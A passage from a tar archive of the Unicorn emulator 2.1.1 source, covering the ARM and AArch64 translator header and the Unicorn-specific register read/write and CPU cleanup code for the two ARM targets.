TBFLAG_AM32, THUMB)) { ops = &thumb_translator_ops; } #ifdef TARGET_AARCH64 if (FIELD_EX32(tb->flags, TBFLAG_ANY, AARCH64_STATE)) { ops = &aarch64_translator_ops; } #endif translator_loop(ops, &dc.base, cpu, tb, max_insns); } void restore_state_to_opc(CPUARMState *env, TranslationBlock *tb, target_ulong *data) { if (is_a64(env)) { env->pc = data[0]; env->condexec_bits = 0; env->exception.syndrome = data[2] << ARM_INSN_START_WORD2_SHIFT; } else { env->regs[15] = data[0]; env->condexec_bits = data[1]; env->exception.syndrome = data[2] << ARM_INSN_START_WORD2_SHIFT; } } �������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/translate.h�����������������������������������������������������������0000664�0000000�0000000�00000025002�14675241067�0020365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef TARGET_ARM_TRANSLATE_H #define TARGET_ARM_TRANSLATE_H #include "exec/translator.h" #include "internals.h" struct uc_struct; /* internal defines */ typedef struct DisasContext { DisasContextBase base; const ARMISARegisters *isar; /* The address of the current instruction being translated. */ target_ulong pc_curr; target_ulong page_start; uint32_t insn; /* Nonzero if this instruction has been conditionally skipped. */ int condjmp; /* The label that will be jumped to when the instruction is skipped. */ TCGLabel *condlabel; /* Thumb-2 conditional execution bits. */ int condexec_mask; int condexec_cond; int thumb; int sctlr_b; MemOp be_data; int user; ARMMMUIdx mmu_idx; /* MMU index to use for normal loads/stores */ uint8_t tbii; /* TBI1|TBI0 for insns */ uint8_t tbid; /* TBI1|TBI0 for data */ bool ns; /* Use non-secure CPREG bank on access */ int fp_excp_el; /* FP exception EL or 0 if enabled */ int sve_excp_el; /* SVE exception EL or 0 if enabled */ int sve_len; /* SVE vector length in bytes */ /* Flag indicating that exceptions from secure mode are routed to EL3. */ bool secure_routed_to_el3; bool vfp_enabled; /* FP enabled via FPSCR.EN */ int vec_len; int vec_stride; bool v7m_handler_mode; bool v8m_secure; /* true if v8M and we're in Secure mode */ bool v8m_stackcheck; /* true if we need to perform v8M stack limit checks */ bool v8m_fpccr_s_wrong; /* true if v8M FPCCR.S != v8m_secure */ bool v7m_new_fp_ctxt_needed; /* ASPEN set but no active FP context */ bool v7m_lspact; /* FPCCR.LSPACT set */ /* Immediate value in AArch32 SVC insn; must be set if is_jmp == DISAS_SWI * so that top level loop can generate correct syndrome information. */ uint32_t svc_imm; int aarch64; int current_el; /* Debug target exception level for single-step exceptions */ int debug_target_el; GHashTable *cp_regs; uint64_t features; /* CPU features bits */ /* Because unallocated encodings generate different exception syndrome * information from traps due to FP being disabled, we can't do a single * "is fp access disabled" check at a high level in the decode tree. * To help in catching bugs where the access check was forgotten in some * code path, we set this flag when the access check is done, and assert * that it is set at the point where we actually touch the FP regs. */ bool fp_access_checked; /* ARMv8 single-step state (this is distinct from the QEMU gdbstub * single-step support). */ bool ss_active; bool pstate_ss; /* True if the insn just emitted was a load-exclusive instruction * (necessary for syndrome information for single step exceptions), * ie A64 LDX*, LDAX*, A32/T32 LDREX*, LDAEX*. */ bool is_ldex; /* True if AccType_UNPRIV should be used for LDTR et al */ bool unpriv; /* True if v8.3-PAuth is active. */ bool pauth_active; /* True with v8.5-BTI and SCTLR_ELx.BT* set. */ bool bt; /* True if any CP15 access is trapped by HSTR_EL2 */ bool hstr_active; /* * >= 0, a copy of PSTATE.BTYPE, which will be 0 without v8.5-BTI. * < 0, set by the current instruction. */ int8_t btype; /* True if this page is guarded. */ bool guarded_page; /* Bottom two bits of XScale c15_cpar coprocessor access control reg */ int c15_cpar; /* TCG op of the current insn_start. */ TCGOp *insn_start; #define TMP_A64_MAX 16 int tmp_a64_count; TCGv_i64 tmp_a64[TMP_A64_MAX]; // Unicorn struct uc_struct *uc; } DisasContext; typedef struct DisasCompare { TCGCond cond; TCGv_i32 value; bool value_global; } DisasCompare; static inline int arm_dc_feature(DisasContext *dc, int feature) { return (dc->features & (1ULL << feature)) != 0; } static inline int get_mem_index(DisasContext *s) { return arm_to_core_mmu_idx(s->mmu_idx); } /* Function used to determine the target exception EL when otherwise not known * or default. */ static inline int default_exception_el(DisasContext *s) { /* If we are coming from secure EL0 in a system with a 32-bit EL3, then * there is no secure EL1, so we route exceptions to EL3. Otherwise, * exceptions can only be routed to ELs above 1, so we target the higher of * 1 or the current EL. */ return (s->mmu_idx == ARMMMUIdx_SE10_0 && s->secure_routed_to_el3) ? 3 : MAX(1, s->current_el); } static inline void disas_set_insn_syndrome(DisasContext *s, uint32_t syn) { /* We don't need to save all of the syndrome so we mask and shift * out unneeded bits to help the sleb128 encoder do a better job. */ syn &= ARM_INSN_START_WORD2_MASK; syn >>= ARM_INSN_START_WORD2_SHIFT; /* We check and clear insn_start_idx to catch multiple updates. */ assert(s->insn_start != NULL); tcg_set_insn_start_param(s->insn_start, 2, syn); s->insn_start = NULL; } /* is_jmp field values */ #define DISAS_JUMP DISAS_TARGET_0 /* only pc was modified dynamically */ #define DISAS_UPDATE DISAS_TARGET_1 /* cpu state was modified dynamically */ /* These instructions trap after executing, so the A32/T32 decoder must * defer them until after the conditional execution state has been updated. * WFI also needs special handling when single-stepping. */ #define DISAS_WFI DISAS_TARGET_2 #define DISAS_SWI DISAS_TARGET_3 /* WFE */ #define DISAS_WFE DISAS_TARGET_4 #define DISAS_HVC DISAS_TARGET_5 #define DISAS_SMC DISAS_TARGET_6 #define DISAS_YIELD DISAS_TARGET_7 /* M profile branch which might be an exception return (and so needs * custom end-of-TB code) */ #define DISAS_BX_EXCRET DISAS_TARGET_8 /* For instructions which want an immediate exit to the main loop, * as opposed to attempting to use lookup_and_goto_ptr. Unlike * DISAS_UPDATE this doesn't write the PC on exiting the translation * loop so you need to ensure something (gen_a64_set_pc_im or runtime * helper) has done so before we reach return from cpu_tb_exec. */ #define DISAS_EXIT DISAS_TARGET_9 #ifdef TARGET_AARCH64 void a64_translate_init(struct uc_struct *uc); void gen_a64_set_pc_im(TCGContext *tcg_ctx, uint64_t val); extern const TranslatorOps aarch64_translator_ops; #else static inline void a64_translate_init(struct uc_struct *uc) { } static inline void gen_a64_set_pc_im(uint64_t val) { } #endif void arm_test_cc(TCGContext *tcg_ctx, DisasCompare *cmp, int cc); void arm_free_cc(TCGContext *tcg_ctx, DisasCompare *cmp); void arm_jump_cc(TCGContext *tcg_ctx, DisasCompare *cmp, TCGLabel *label); void arm_gen_test_cc(TCGContext *tcg_ctx, int cc, TCGLabel *label); /* Return state of Alternate Half-precision flag, caller frees result */ static inline TCGv_i32 get_ahp_flag(TCGContext *tcg_ctx) { TCGv_i32 ret = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUARMState, vfp.xregs[ARM_VFP_FPSCR])); tcg_gen_extract_i32(tcg_ctx, ret, ret, 26, 1); return ret; } /* Set bits within PSTATE. */ static inline void set_pstate_bits(TCGContext *tcg_ctx, uint32_t bits) { TCGv_i32 p = tcg_temp_new_i32(tcg_ctx); tcg_debug_assert(!(bits & CACHED_PSTATE_BITS)); tcg_gen_ld_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_gen_ori_i32(tcg_ctx, p, p, bits); tcg_gen_st_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_temp_free_i32(tcg_ctx, p); } /* Clear bits within PSTATE. */ static inline void clear_pstate_bits(TCGContext *tcg_ctx, uint32_t bits) { TCGv_i32 p = tcg_temp_new_i32(tcg_ctx); tcg_debug_assert(!(bits & CACHED_PSTATE_BITS)); tcg_gen_ld_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_gen_andi_i32(tcg_ctx, p, p, ~bits); tcg_gen_st_i32(tcg_ctx, p, tcg_ctx->cpu_env, offsetof(CPUARMState, pstate)); tcg_temp_free_i32(tcg_ctx, p); } /* If the singlestep state is Active-not-pending, advance to Active-pending. */ static inline void gen_ss_advance(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->ss_active) { s->pstate_ss = 0; clear_pstate_bits(tcg_ctx, PSTATE_SS); } } static inline void gen_exception(TCGContext *tcg_ctx, int excp, uint32_t syndrome, uint32_t target_el) { TCGv_i32 tcg_excp = tcg_const_i32(tcg_ctx, excp); TCGv_i32 tcg_syn = tcg_const_i32(tcg_ctx, syndrome); TCGv_i32 tcg_el = tcg_const_i32(tcg_ctx, target_el); gen_helper_exception_with_syndrome(tcg_ctx, tcg_ctx->cpu_env, tcg_excp, tcg_syn, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_el); tcg_temp_free_i32(tcg_ctx, tcg_syn); tcg_temp_free_i32(tcg_ctx, tcg_excp); } /* Generate an architectural singlestep exception */ static inline void gen_swstep_exception(DisasContext *s, int isv, int ex) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool same_el = (s->debug_target_el == s->current_el); /* * If singlestep is targeting a lower EL than the current one, * then s->ss_active must be false and we can never get here. */ assert(s->debug_target_el >= s->current_el); gen_exception(tcg_ctx, EXCP_UDEF, syn_swstep(same_el, isv, ex), s->debug_target_el); } /* * Given a VFP floating point constant encoded into an 8 bit immediate in an * instruction, expand it to the actual constant value of the specified * size, as per the VFPExpandImm() pseudocode in the Arm ARM. */ uint64_t vfp_expand_imm(int size, uint8_t imm8); /* Vector operations shared between ARM and AArch64. */ extern const GVecGen3 mla_op[4]; extern const GVecGen3 mls_op[4]; extern const GVecGen3 cmtst_op[4]; extern const GVecGen3 sshl_op[4]; extern const GVecGen3 ushl_op[4]; extern const GVecGen2i ssra_op[4]; extern const GVecGen2i usra_op[4]; extern const GVecGen2i sri_op[4]; extern const GVecGen2i sli_op[4]; extern const GVecGen4 uqadd_op[4]; extern const GVecGen4 sqadd_op[4]; extern const GVecGen4 uqsub_op[4]; extern const GVecGen4 sqsub_op[4]; void gen_cmtst_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void gen_ushl_i32(TCGContext *, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b); void gen_sshl_i32(TCGContext *, TCGv_i32 d, TCGv_i32 a, TCGv_i32 b); void gen_ushl_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); void gen_sshl_i64(TCGContext *, TCGv_i64 d, TCGv_i64 a, TCGv_i64 b); /* * Forward to the isar_feature_* tests given a DisasContext pointer. */ #define dc_isar_feature(name, ctx) isar_feature_##name(ctx->isar) #endif /* TARGET_ARM_TRANSLATE_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/unicorn.h�������������������������������������������������������������0000664�0000000�0000000�00000001374�14675241067�0020053�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ #ifndef UC_QEMU_TARGET_ARM_H #define UC_QEMU_TARGET_ARM_H // functions to read & write registers uc_err reg_read_arm(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_read_aarch64(void *env, int mode, unsigned int regid, void *value, size_t *size); uc_err reg_write_arm(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); uc_err reg_write_aarch64(void *env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc); void uc_init_arm(struct uc_struct *uc); void uc_init_aarch64(struct uc_struct *uc); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/unicorn_aarch64.c�����������������������������������������������������0000664�0000000�0000000�00000035266�14675241067�0021365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/typedefs.h" #include "unicorn/unicorn.h" #include "sysemu/cpus.h" #include "cpu.h" #include "kvm-consts.h" #include "unicorn_common.h" #include "uc_priv.h" #include "unicorn.h" ARMCPU *cpu_aarch64_init(struct uc_struct *uc); static void arm64_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUARMState *)uc->cpu->env_ptr)->pc = address; } static uint64_t arm64_get_pc(struct uc_struct *uc) { return ((CPUARMState *)uc->cpu->env_ptr)->pc; } static void arm64_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; ARMCPU *cpu = (ARMCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; ARMELChangeHook *entry, *next; CPUARMState *env = &cpu->env; uint32_t nr; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } QLIST_FOREACH_SAFE(entry, &cpu->pre_el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } QLIST_FOREACH_SAFE(entry, &cpu->el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { nr = cpu->pmsav7_dregion; if (nr) { if (arm_feature(env, ARM_FEATURE_V8)) { g_free(env->pmsav8.rbar[M_REG_NS]); g_free(env->pmsav8.rlar[M_REG_NS]); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { g_free(env->pmsav8.rbar[M_REG_S]); g_free(env->pmsav8.rlar[M_REG_S]); } } else { g_free(env->pmsav7.drbar); g_free(env->pmsav7.drsr); g_free(env->pmsav7.dracr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { nr = cpu->sau_sregion; if (nr) { g_free(env->sau.rbar); g_free(env->sau.rlar); } } g_free(cpu->cpreg_indexes); g_free(cpu->cpreg_values); g_free(cpu->cpreg_vmstate_indexes); g_free(cpu->cpreg_vmstate_values); g_hash_table_destroy(cpu->cp_regs); } static void reg_reset(struct uc_struct *uc) { CPUArchState *env = uc->cpu->env_ptr; memset(env->xregs, 0, sizeof(env->xregs)); env->pc = 0; } static uc_err read_cp_reg(CPUARMState *env, uc_arm64_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, cp->crn, cp->crm, cp->op0, cp->op1, cp->op2)); if (!ri) { return UC_ERR_ARG; } cp->val = read_raw_cp_reg(env, ri); return UC_ERR_OK; } static uc_err write_cp_reg(CPUARMState *env, uc_arm64_cp_reg *cp) { ARMCPU *cpu = ARM_CPU(env->uc->cpu); const ARMCPRegInfo *ri = get_arm_cp_reginfo( cpu->cp_regs, ENCODE_AA64_CP_REG(CP_REG_ARM64_SYSREG_CP, cp->crn, cp->crm, cp->op0, cp->op1, cp->op2)); if (!ri) { return UC_ERR_ARG; } if (ri->raw_writefn) { ri->raw_writefn(env, ri, cp->val); } else if (ri->writefn) { ri->writefn(env, ri, cp->val); } else { if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(env, ri) = cp->val; } else { CPREG_FIELD32(env, ri) = cp->val; } } return UC_ERR_OK; } DEFAULT_VISIBILITY uc_err reg_read(void *_env, int mode, unsigned int regid, void *value, size_t *size) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[regid - UC_ARM64_REG_X0]; } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = READ_DWORD(env->xregs[regid - UC_ARM64_REG_W0]); } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { // FIXME CHECK_REG_TYPE(float64[2]); float64 *dst = (float64 *)value; uint32_t reg_index = regid - UC_ARM64_REG_Q0; dst[0] = env->vfp.zregs[reg_index].d[0]; dst[1] = env->vfp.zregs[reg_index].d[1]; } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { CHECK_REG_TYPE(float64); *(float64 *)value = env->vfp.zregs[regid - UC_ARM64_REG_D0].d[0]; } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { CHECK_REG_TYPE(int32_t); *(int32_t *)value = READ_DWORD(env->vfp.zregs[regid - UC_ARM64_REG_S0].d[0]); } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { CHECK_REG_TYPE(int16_t); *(int16_t *)value = READ_WORD(env->vfp.zregs[regid - UC_ARM64_REG_H0].d[0]); } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { CHECK_REG_TYPE(int8_t); *(int8_t *)value = READ_BYTE_L(env->vfp.zregs[regid - UC_ARM64_REG_B0].d[0]); } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->elr_el[regid - UC_ARM64_REG_ELR_EL0]; } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->sp_el[regid - UC_ARM64_REG_SP_EL0]; } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0]; } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.far_el[regid - UC_ARM64_REG_FAR_EL0]; } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0]; } else { switch (regid) { default: break; case UC_ARM64_REG_CPACR_EL1: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = env->cp15.cpacr_el1; break; case UC_ARM64_REG_TPIDR_EL0: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidr_el[0]; break; case UC_ARM64_REG_TPIDRRO_EL0: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidrro_el[0]; break; case UC_ARM64_REG_TPIDR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.tpidr_el[1]; break; case UC_ARM64_REG_X29: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[29]; break; case UC_ARM64_REG_X30: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[30]; break; case UC_ARM64_REG_PC: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->pc; break; case UC_ARM64_REG_SP: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->xregs[31]; break; case UC_ARM64_REG_NZCV: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = cpsr_read(env) & CPSR_NZCV; break; case UC_ARM64_REG_PSTATE: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = pstate_read(env); break; case UC_ARM64_REG_TTBR0_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.ttbr0_el[1]; break; case UC_ARM64_REG_TTBR1_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.ttbr1_el[1]; break; case UC_ARM64_REG_PAR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.par_el[1]; break; case UC_ARM64_REG_MAIR_EL1: CHECK_REG_TYPE(uint64_t); *(uint64_t *)value = env->cp15.mair_el[1]; break; case UC_ARM64_REG_CP_REG: CHECK_REG_TYPE(uc_arm64_cp_reg); ret = read_cp_reg(env, (uc_arm64_cp_reg *)value); break; case UC_ARM64_REG_FPCR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = vfp_get_fpcr(env); break; case UC_ARM64_REG_FPSR: CHECK_REG_TYPE(uint32_t); *(uint32_t *)value = vfp_get_fpsr(env); break; } } return ret; } DEFAULT_VISIBILITY uc_err reg_write(void *_env, int mode, unsigned int regid, const void *value, size_t *size, int *setpc) { CPUARMState *env = _env; uc_err ret = UC_ERR_ARG; if (regid >= UC_ARM64_REG_V0 && regid <= UC_ARM64_REG_V31) { regid += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0; } if (regid >= UC_ARM64_REG_X0 && regid <= UC_ARM64_REG_X28) { CHECK_REG_TYPE(uint64_t); env->xregs[regid - UC_ARM64_REG_X0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_W0 && regid <= UC_ARM64_REG_W30) { CHECK_REG_TYPE(uint32_t); WRITE_DWORD(env->xregs[regid - UC_ARM64_REG_W0], *(uint32_t *)value); } else if (regid >= UC_ARM64_REG_Q0 && regid <= UC_ARM64_REG_Q31) { CHECK_REG_TYPE(float64[2]); float64 *src = (float64 *)value; uint32_t reg_index = regid - UC_ARM64_REG_Q0; env->vfp.zregs[reg_index].d[0] = src[0]; env->vfp.zregs[reg_index].d[1] = src[1]; } else if (regid >= UC_ARM64_REG_D0 && regid <= UC_ARM64_REG_D31) { CHECK_REG_TYPE(float64); env->vfp.zregs[regid - UC_ARM64_REG_D0].d[0] = *(float64 *)value; } else if (regid >= UC_ARM64_REG_S0 && regid <= UC_ARM64_REG_S31) { CHECK_REG_TYPE(int32_t); WRITE_DWORD(env->vfp.zregs[regid - UC_ARM64_REG_S0].d[0], *(int32_t *)value); } else if (regid >= UC_ARM64_REG_H0 && regid <= UC_ARM64_REG_H31) { CHECK_REG_TYPE(int16_t); WRITE_WORD(env->vfp.zregs[regid - UC_ARM64_REG_H0].d[0], *(int16_t *)value); } else if (regid >= UC_ARM64_REG_B0 && regid <= UC_ARM64_REG_B31) { CHECK_REG_TYPE(int8_t); WRITE_BYTE_L(env->vfp.zregs[regid - UC_ARM64_REG_B0].d[0], *(int8_t *)value); } else if (regid >= UC_ARM64_REG_ELR_EL0 && regid <= UC_ARM64_REG_ELR_EL3) { CHECK_REG_TYPE(uint64_t); env->elr_el[regid - UC_ARM64_REG_ELR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_SP_EL0 && regid <= UC_ARM64_REG_SP_EL3) { CHECK_REG_TYPE(uint64_t); env->sp_el[regid - UC_ARM64_REG_SP_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_ESR_EL0 && regid <= UC_ARM64_REG_ESR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.esr_el[regid - UC_ARM64_REG_ESR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_FAR_EL0 && regid <= UC_ARM64_REG_FAR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.far_el[regid - UC_ARM64_REG_FAR_EL0] = *(uint64_t *)value; } else if (regid >= UC_ARM64_REG_VBAR_EL0 && regid <= UC_ARM64_REG_VBAR_EL3) { CHECK_REG_TYPE(uint64_t); env->cp15.vbar_el[regid - UC_ARM64_REG_VBAR_EL0] = *(uint64_t *)value; } else { switch (regid) { default: break; case UC_ARM64_REG_CPACR_EL1: CHECK_REG_TYPE(uint32_t); env->cp15.cpacr_el1 = *(uint32_t *)value; break; case UC_ARM64_REG_TPIDR_EL0: CHECK_REG_TYPE(uint64_t); env->cp15.tpidr_el[0] = *(uint64_t *)value; break; case UC_ARM64_REG_TPIDRRO_EL0: CHECK_REG_TYPE(uint64_t); env->cp15.tpidrro_el[0] = *(uint64_t *)value; break; case UC_ARM64_REG_TPIDR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.tpidr_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_X29: CHECK_REG_TYPE(uint64_t); env->xregs[29] = *(uint64_t *)value; break; case UC_ARM64_REG_X30: CHECK_REG_TYPE(uint64_t); env->xregs[30] = *(uint64_t *)value; break; case UC_ARM64_REG_PC: CHECK_REG_TYPE(uint64_t); env->pc = *(uint64_t *)value; *setpc = 1; break; case UC_ARM64_REG_SP: CHECK_REG_TYPE(uint64_t); env->xregs[31] = *(uint64_t *)value; break; case UC_ARM64_REG_NZCV: CHECK_REG_TYPE(uint32_t); cpsr_write(env, *(uint32_t *)value, CPSR_NZCV, CPSRWriteRaw); break; case UC_ARM64_REG_PSTATE: CHECK_REG_TYPE(uint32_t); pstate_write(env, *(uint32_t *)value); break; case UC_ARM64_REG_TTBR0_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.ttbr0_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_TTBR1_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.ttbr1_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_PAR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.par_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_MAIR_EL1: CHECK_REG_TYPE(uint64_t); env->cp15.mair_el[1] = *(uint64_t *)value; break; case UC_ARM64_REG_CP_REG: CHECK_REG_TYPE(uc_arm64_cp_reg); ret = write_cp_reg(env, (uc_arm64_cp_reg *)value); arm_rebuild_hflags(env); break; case UC_ARM64_REG_FPCR: CHECK_REG_TYPE(uint32_t); vfp_set_fpcr(env, *(uint32_t *)value); break; case UC_ARM64_REG_FPSR: CHECK_REG_TYPE(uint32_t); vfp_set_fpsr(env, *(uint32_t *)value); break; } } return ret; } static int arm64_cpus_init(struct uc_struct *uc, const char *cpu_model) { ARMCPU *cpu; cpu = cpu_aarch64_init(uc); if (cpu == NULL) { return -1; } return 0; } DEFAULT_VISIBILITY void uc_init(struct uc_struct *uc) { uc->reg_read = reg_read; uc->reg_write = reg_write; uc->reg_reset = reg_reset; uc->set_pc = arm64_set_pc; uc->get_pc = arm64_get_pc; uc->release = arm64_release; uc->cpus_init = arm64_cpus_init; uc->cpu_context_size = offsetof(CPUARMState, cpu_watchpoint); uc_common_init(uc); } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/arm/unicorn_arm.c���������������������������������������������������������0000664�0000000�0000000�00000061225�14675241067�0020706�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015 */ /* Modified for Unicorn Engine by Chen Huitao<chenhuitao@hfmrit.com>, 2020 */ #include "qemu/typedefs.h" #include "unicorn/unicorn.h" #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "cpu.h" #include "uc_priv.h" #include "unicorn_common.h" #include "unicorn.h" ARMCPU *cpu_arm_init(struct uc_struct *uc); static void arm_set_pc(struct uc_struct *uc, uint64_t address) { ((CPUARMState *)uc->cpu->env_ptr)->pc = address; ((CPUARMState *)uc->cpu->env_ptr)->regs[15] = address & ~1; ((CPUARMState *)uc->cpu->env_ptr)->thumb = address & 1; } static uint64_t arm_get_pc(struct uc_struct *uc) { return ((CPUARMState *)uc->cpu->env_ptr)->regs[15] | ((CPUARMState *)uc->cpu->env_ptr)->thumb; } static void arm_release(void *ctx) { int i; TCGContext *tcg_ctx = (TCGContext *)ctx; ARMCPU *cpu = (ARMCPU *)tcg_ctx->uc->cpu; CPUTLBDesc *d = cpu->neg.tlb.d; CPUTLBDescFast *f = cpu->neg.tlb.f; CPUTLBDesc *desc; CPUTLBDescFast *fast; ARMELChangeHook *entry, *next; CPUARMState *env = &cpu->env; uint32_t nr; release_common(ctx); for (i = 0; i < NB_MMU_MODES; i++) { desc = &(d[i]); fast = &(f[i]); g_free(desc->iotlb); g_free(fast->table); } QLIST_FOREACH_SAFE(entry, &cpu->pre_el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } QLIST_FOREACH_SAFE(entry, &cpu->el_change_hooks, node, next) { QLIST_SAFE_REMOVE(entry, node); g_free(entry); } if (arm_feature(env, ARM_FEATURE_PMSA) && arm_feature(env, ARM_FEATURE_V7)) { nr = cpu->pmsav7_dregion; if (nr) { if (arm_feature(env, ARM_FEATURE_V8)) { g_free(env->pmsav8.rbar[M_REG_NS]); g_free(env->pmsav8.rlar[M_REG_NS]); if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { g_free(env->pmsav8.rbar[M_REG_S]); g_free(env->pmsav8.rlar[M_REG_S]); } } else { g_free(env->pmsav7.drbar); g_free(env->pmsav7.drsr); g_free(env->pmsav7.dracr); } } } if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { nr = cpu->sau_sregion; if (nr) { g_free(env->sau.rbar); g_free(env->sau.rlar); } } g_free(cpu->cpreg_indexes); g_free(cpu->cpreg_values); g_free(cpu->cpreg_vmstate_indexes); g_free(cpu->cpreg_vmstate_values); g_hash_table_destroy(cpu->cp_regs); } static void reg_reset(struct 